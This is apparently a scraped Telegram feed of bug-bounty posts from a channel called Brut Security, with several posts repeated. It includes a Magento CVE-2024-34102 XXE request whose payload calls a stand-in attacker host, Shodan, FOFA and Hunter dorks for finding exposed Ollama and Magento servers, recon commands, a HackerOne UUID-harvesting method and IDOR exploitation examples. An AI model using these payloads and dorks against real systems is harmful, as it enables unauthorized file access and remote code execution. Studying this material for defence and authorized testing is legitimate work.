Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.
Similar to this https://nas.io/brutsecurity
Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
🔥1
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
👍8
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
HackerOne
HackerOne | Global leader in offensive security | Security for AI | Crowdsourced Security
HackerOne combines AI with the ingenuity of the largest community of security researchers to find and fix security, privacy, and AI vulnerabilities across the SDLC. HackerOne offers AI red teaming, crowdsourced security, bug bounty, vulnerability disclosure…
👍3
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司"
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
🐳3👍1
Brut Security
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge. Similar to this https://nas.io/brutsecurity
Day 1: Run Subfinder
Day 2: Scrap Js
Day 3: Report etc. till day 30.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Discussion
Community Discussion
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned «💥 Join Our Bugbounty Discussion Group 💥 🔥 https://news.1rj.ru/str/brutsec🔥 🤖 https://discord.gg/GZBsQMY6🤖 »
⚔️Pentest-Windows
🔰Windows11 Penetration Suite Toolkit
📌A Windows penetration testing environment that works out of the box.
⚠️This project was created for educational purposes and should not be used in environments without legal authorization.
🔗Link: https://lnkd.in/gtX3GbR8
🔖#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
🔰Windows11 Penetration Suite Toolkit
📌A Windows penetration testing environment that works out of the box.
⚠️This project was created for educational purposes and should not be used in environments without legal authorization.
🔗Link: https://lnkd.in/gtX3GbR8
🔖#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
📢You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)
📝Example:
🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:
⚠Example:
📝Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:
⚠Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
👍2🔥1
💪🏻Scan for Adobe Commerce & Magento - XXE
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
🔍 Details: https://lnkd.in/dBy32DtY
📑 Nuclei Template: https://lnkd.in/dUNFMUny
🔧 GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
🔍 Details: https://lnkd.in/dBy32DtY
📑 Nuclei Template: https://lnkd.in/dUNFMUny
🔧 GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
👍1
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
🔹 Web Scanner & Crawler
🔹Fuzzing with Intruder (Part3)
🔹Fuzzing with Intruder (Part2)
🔹Fuzzing with Intruder (Part1)
🔹XSS Validator
🔹Configuring Proxy
🔹Burp Collaborator
🔹HackBar
🔹Burp Sequencer
🔹Turbo Intruder
🔹Engagement Tools
🔹Payload Processing Rule (Part2)
🔹Payload Processing Rule (Part1)
🔹Beginners Guide to Burpsuite Payloads (Part2)
🔹Beginners Guide to Burpsuite Payloads (Part1)
🔹Encoder & Decoder Tutorial
🔹Active Scan++
🔹Software Vulnerability Scanner
🔹Burp’s Project Management
🔹Repeater
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2🫡1
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
🚨Unauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
🚨Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access
to sensitive files, including…
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access
to sensitive files, including…
👍6🤯2😱1
#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🤔1
This media is not supported in your browser
VIEW IN TELEGRAM
Whoever is commenting it doesn't work on latest updates of firefox, the video is for them only. No offence to anyone but you guys lack a lot of research's!
👍3❤1🔥1